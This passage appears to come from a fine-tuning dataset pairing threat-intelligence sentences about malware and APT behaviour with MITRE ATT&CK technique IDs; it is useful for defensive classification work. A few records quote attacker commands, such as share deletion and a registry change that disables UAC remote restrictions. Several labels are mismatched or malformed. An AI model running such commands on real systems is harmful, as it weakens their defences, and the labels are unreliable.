- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 leveraged sticky keys to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.008 - Event Triggered Execution: Accessibility Features"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rancor launched a scheduled task to gain persistence using the \"schtasks /create /sc\" command."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Heyoka Backdoor can enumerate drives on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDBbot has the ability to clean up and remove data structures from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ADVSTORESHELL can list files and directories."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has sometimes used drive-by attacks against vulnerable browser plugins."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Finally, it deletes Shadow Volume Copies and prevent the victim from using Shadow Volumes to recover their encrypted files"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation', 'T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has added persistence via the Registry key HKCU\\Software\\Microsoft\\CurrentVersion\\Run\\."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Destructive dstr command in BE2 config file Also, on some machines, documents were encrypted, but no related plugin could be found"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The group has the capability to set up phishing infrastructure to mimic well known websites and trick victims to enter their credentials. This is one of the main methods used by this actor to collect email addresses that later will be used to send spearphishing emails"
- },
- {
- "role": "assistant",
- "content": "T1586.002 - Email Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWizard has the ability to scan ports on a compromised network."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nebulae uses functions named \"StartUserModeBrowserInjection\" and \"StopUserModeBrowserInjection\" indicating that it's trying to imitate chrome_frame_helper.dll."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SHOTPUT has a command to obtain a directory listing."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can use a custom command and control protocol that can be encapsulated in HTTP or HTTPS. All protocols use their standard assigned ports."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AuTo Stealer can place malicious executables in a victim's AutoRun registry key or StartUp directory, depending on the AV product installed, to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A module has a default C2 port of 13000."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obtains additional code to execute on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can execute commands remotely by creating a new service on the remote system."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo includes payloads written in JavaScript."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The lnk files were an especially interesting development because the powershell code they contain for decoding and dropping the payload is nearly identical to that utilized by the Zebrocy threat actor a month earlier"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed during a Mandiant incident response in 2018 and, to date, solely utilized by APT34"
- },
- {
- "role": "assistant",
- "content": "T1003.005 - OS Credential Dumping: Cached Domain Credentials', 'T1003.004 - OS Credential Dumping: LSA Secrets', 'T1555 - Credentials from Password Stores', 'T1552.001 - Unsecured Credentials: Credentials In Files', 'T1003.001 - OS Credential Dumping: LSASS Memory', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell can check the services on the system."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gather domain and account names based on all running processes Gathering account information from running processes"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If that fails, the payload will use DNS tunneling by first issuing a DNS query to resolve the following domain to notify the C2 that the payload will send data to it in subsequent DNS queries: ns1.. The payload will then split the message up into 60-byte chunks (only 1 in this case), which it will send to the C2 via DNS queries to resolve domains structured as: .. The payload will notify the C2 that it is done sending data by issuing a DNS query to resolve a domain structured as: ns2.. Package Comparison of the QUADAGENT Samples The bat2exe version (SHA256: 5f001f3387ddfc0314446d0c950da2cec4c786e2374d42beb3acce6883bb4e63)has a batch script, PowerShell script, and associated file names embedded within several resources that it will decrypt using RC4 and various MD5 hashes for keys"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1573 - Encrypted Channel', 'T1048 - Exfiltration Over Alternative Protocol', 'T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used port 80 for C2."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Bazar loader has named malicious shortcuts \"adobe\" and mimicked communications software."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WastedLocker can delete shadow volumes."
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Night Dragon, threat actors used software packing in its tools."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoxCaon has created a working folder for collected files that it sends to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The screenshot in Figure 8 of the inf method within a Cannon sample (SHA256: 4405cfbf28…) shows the information gathered that is exfiltrated to the C2 via email, specifically with RunningPlace and LogicalDrives header strings: Figure 8 inf method used by Cannon When comparing the two Cannon variants, we found a method within a Delphi Cannon sample (SHA256: 5a02d4e5f6…) showing the use of Running place and Logical_Drivers as header strings to the system information it is collecting and sending to the C2 via email"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Spark has checked the results of the \"GetKeyboardLayoutList\" and the language name returned by \"GetLocaleInfoA\" to make sure they contain the word “Arabic” before executing."
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Keydnap uses Python for scripting to execute additional commands."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aoqin Dragon has spread malware in target networks by copying modules to folders masquerading as removable devices."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has acquired open-source tools for some of it's operations; for example it acquired Invoke-PSImage to establish an encrypted channel from a compromised host to Sandworm Team's C2 server as part of its preparation for the 2018 Winter Olympics attack."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak obtains Windows logon password details."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "With domain administrator privileges obtained, the threat actors then moved laterally throughout the network using SMB and RDP to deploy Cobalt Strike beacons on the domain controllers around 1 hour after the initial execution of Bazar. On the domain controllers, some additional discovery was done using the PowerShell Active Directory module. After establishing Cobalt Strike beacons on those they felt ready to proceed to their final objectives"
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "USBStealer registers itself under a Registry Run key with the name \"USB Disk Security.\""
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WIRTE has named a first stage dropper `Kaspersky Update Agent` in order to appear legitimate."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ServHelper has the ability to execute a PowerShell script to get information from the infected host."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkComet can load any files onto the infected machine to execute."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sakula uses single-byte XOR obfuscation to obfuscate many of its files."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some ZeroT DLL files have been packed with UPX."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has used encoded data in HTTP URLs for C2."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team used a backdoor which could execute a supplied DLL using rundll32.exe."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "specifically looks for Domain Admins, Power Users, and the Administrators groups within the domain and locally"
- },
- {
- "role": "assistant",
- "content": "T1069 - Permission Groups Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used the Invoke-Inveigh PowerShell cmdlets, likely for name service poisoning."
- },
- {
- "role": "assistant",
- "content": "T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These dropped files bundle functionality for both 64bit and 32bit Windows systems and are all located within one directory: C:\\Documents and Settings\\user\\Application Data\\ATI_Subsystem\\ 6761106f816313394a653db5172dc487,amdhcp32.dll,54kb ← 32bit dll,CompiledOn:2014.07.02 21:13:24 d596827d48a3ff836545b3a999f2c3e3,aticaldd.dll,60kb ← 64bit dll,CompiledOn:2014.07.02 21:13:26 bc626c8f11ed753f33ad1c0fe848d898,atiumdag.dll,285kb ← 32bit dll, Trojan.Win32.CozyDuke.a, CompiledOn:2014.07.02 21:13:26 4152e79e3dbde55dcf3fc2014700a022,6kb,racss.dat The code copies rundll32.exe from windows\\system32 to its newly created %appdata%\\ATI_Subsystem subdirectory as “amdocl_as32.exe” alongside the three dll’s listed above"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection', 'T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking', 'T1218.011 - Signed Binary Proxy Execution: Rundll32', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 performed network scanning on the network to search for open ports, services, OS finger-printing, and other vulnerabilities."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once Shamoon has access to a network share, it enables the RemoteRegistry service on the target system. It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy\" to 1."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In addition, multiple APT40 command and control (C2) domains were initially registered by China based domain resellers and had Whois records with Chinese location information, suggesting a China based infrastructure procurement process"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lastly, the new variant of RogueRobin is capable of using the Google Drive cloud service for its C2 channel, suggesting that DarkHydrus may be shifting to abusing legitimate cloud services for their infrastructure"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The trojan supports file deletion."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the .NET PE file has been run, we observed the same behavior as the above QUADAGENT sample of dropping a PowerShell script with the filename SystemDiskClean.ps1 alongside a VBScript file with the same name"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "copies staged data to removable drives when they are inserted into the system."
- },
- {
- "role": "assistant",
- "content": "T1052 - Exfiltration Over Physical Medium"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HotCroissant has the ability to retrieve a list of files in a given directory as well as drives and drive types."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrifeWater can send data and files from a compromised host to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Milan can enumerate the targeted machine's name and GUID."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HyperBro has the ability to take screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The following commands are available: Command SubCommand Description VER Generates the following IRC client command that will be sent to the C2 server: PRIVMSG : 8 LED= 20160124 KILL Trojan disconnects from the IRC server and terminates itself RESET Trojan disconnects from the IRC server and runs the executable again OS Obtains the Windows version and responds to the C2 with the following message “PRIVMSG :”: Windows NT Windows 95 Windows 98 Windows ME Windows 2003 Windows XP Windows 7 Windows Vista Unkown os info !SH EXEC Not supported MD Creates a specified directory"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API', 'T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot has the ability to use HTTP and HTTPS in communication with C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Whitefly has used an open-source tool to exploit a known Windows privilege escalation vulnerability (CVE-2016-0051) on unpatched computers."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses port 80 for C2."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers information about opened windows."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gold Dragon collects the endpoint victim's username and uses it as a basis for downloading additional components from the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RobbinHood disconnects all network shares from the computer with the command \"net use * /DELETE /Y\"."
- },
- {
- "role": "assistant",
- "content": "T1070.005 - Indicator Removal on Host: Network Share Connection Removal"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT used Nmap for remote system discovery."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has distributed URLs in phishing e-mails that link to lure documents."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The HTTP variant checks if Kaspersky is installed on the victim’s machine by searching for the existence of files in the Kaspersky installation folder"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
